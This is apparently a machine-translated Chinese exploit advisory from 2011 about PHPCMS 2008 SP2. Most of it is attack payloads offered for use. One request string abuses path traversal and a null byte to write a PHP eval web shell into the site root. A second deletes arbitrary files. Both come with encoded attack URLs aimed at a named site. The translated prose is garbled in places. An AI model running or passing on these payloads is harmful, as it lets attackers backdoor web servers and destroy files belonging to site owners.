PHPCMS 2 0 0 8 SP2 latest local file inclusion vulnerability-vulnerability warning-the black bar safety net

2011-04-12T00:00:00
ID MYHACK58:62201130077
Type myhack58
Reporter 佚名
Modified 2011-04-12T00:00:00

Description

PHPCMS into the hardest hit. A vulnerability would allow people to storm out. 0day also often have. Nonsense not much said. Directly on the method. Take the shell method:

Contains:admin/safe. inc. php file GET submitted data

Will be generated under the root directory a word

Encrypt the following string:

$evil=’i=1&m=1&f=tmdsb&action=edit_code&file_path=tmdsb. php&code=<? eval($_POST[tmdsb])?& gt;&mod=../../admin/safe. inc. php%0 0';

<http://www.tmdsb.com/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8>

Will be generated under the root directory word Trojan.

Arbitrary file delete vulnerability:

$evil=’i=1&m=1&f=tmdsb&action=del_file&files=robots. txt&mod=../../admin/safe. inc. php%0 0';

<http://www.tmdsb.com/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw>